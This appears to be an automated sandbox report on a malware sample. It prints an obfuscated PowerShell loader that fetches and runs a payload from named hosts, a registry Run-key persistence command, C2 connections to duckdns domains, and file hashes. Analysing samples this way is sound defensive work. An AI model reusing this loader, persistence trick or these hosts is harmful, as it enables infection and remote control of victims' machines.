Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. ,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | milanaces.com | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | 108.216.25.193.in-addr.arpa | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 23.200.147.11:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.147.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | janbours92harbu02.duckdns.org | udp |
| US | 192.169.69.26:3980 | janbours92harbu02.duckdns.org | tcp |
| US | 192.169.69.26:3981 | janbours92harbu02.duckdns.org | tcp |
| US | 8.8.8.8:53 | 26.69.169.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | janbours92harbu03.duckdns.org | udp |
| BE | 172.111.244.40:3980 | janbours92harbu03.duckdns.org | tcp |
| US | 8.8.8.8:53 | 40.244.111.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | janbours92harbu02.duckdns.org | udp |
| US | 192.169.69.26:3980 | janbours92harbu02.duckdns.org | tcp |
| US | 192.169.69.26:3981 | janbours92harbu02.duckdns.org | tcp |
| US | 8.8.8.8:53 | janbours92harbu03.duckdns.org | udp |
| BE | 172.111.244.40:3980 | janbours92harbu03.duckdns.org | tcp |
Files
memory/1044-0-0x00007FF8A22F3000-0x00007FF8A22F5000-memory.dmp
memory/1044-1-0x000001D6C58F0000-0x000001D6C5912000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtczaukc.pnc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1044-11-0x00007FF8A22F0000-0x00007FF8A2DB1000-memory.dmp
memory/1044-12-0x00007FF8A22F0000-0x00007FF8A2DB1000-memory.dmp
memory/1540-15-0x0000000005200000-0x0000000005236000-memory.dmp
memory/1540-16-0x0000000005870000-0x0000000005E98000-memory.dmp
memory/1540-17-0x0000000005F10000-0x0000000005F32000-memory.dmp
memory/1540-18-0x0000000005FB0000-0x0000000006016000-memory.dmp
memory/1540-19-0x00000000060D0000-0x0000000006136000-memory.dmp
memory/1540-29-0x0000000006200000-0x0000000006554000-memory.dmp
memory/1540-30-0x0000000006820000-0x000000000683E000-memory.dmp
memory/1540-31-0x0000000006850000-0x000000000689C000-memory.dmp
memory/1540-32-0x0000000008190000-0x000000000880A000-memory.dmp
memory/1540-33-0x0000000006D70000-0x0000000006D8A000-memory.dmp
memory/1540-34-0x0000000007B10000-0x0000000007BA6000-memory.dmp
memory/1540-35-0x0000000007860000-0x0000000007882000-memory.dmp
memory/1540-36-0x0000000008810000-0x0000000008DB4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Kubikcentimeter.Gua
| MD5 | 8fc3031fccbd90ac8beb25c3ce089816 |
| SHA1 | 95e5412e39afc737103ab2e516642e9952c366e9 |
| SHA256 | 7ab6a49072545cc0f6da993333894c81fee597e41129379d30c3b4f249667343 |
| SHA512 | 8852b4efe8f23c6c01b0a500eacb1d8ce38426516da706435addd641cd1b32d024109f1d6a123b9672f173362caae707f87dbb2a8f32ec3325d3a9e5bd43f11b |
memory/1540-38-0x0000000008DC0000-0x000000000DE14000-memory.dmp
memory/1044-40-0x00007FF8A22F3000-0x00007FF8A22F5000-memory.dmp
memory/1044-41-0x00007FF8A22F0000-0x00007FF8A2DB1000-memory.dmp
memory/1044-50-0x00007FF8A22F0000-0x00007FF8A2DB1000-memory.dmp
memory/2264-48-0x0000000001E40000-0x0000000006E94000-memory.dmp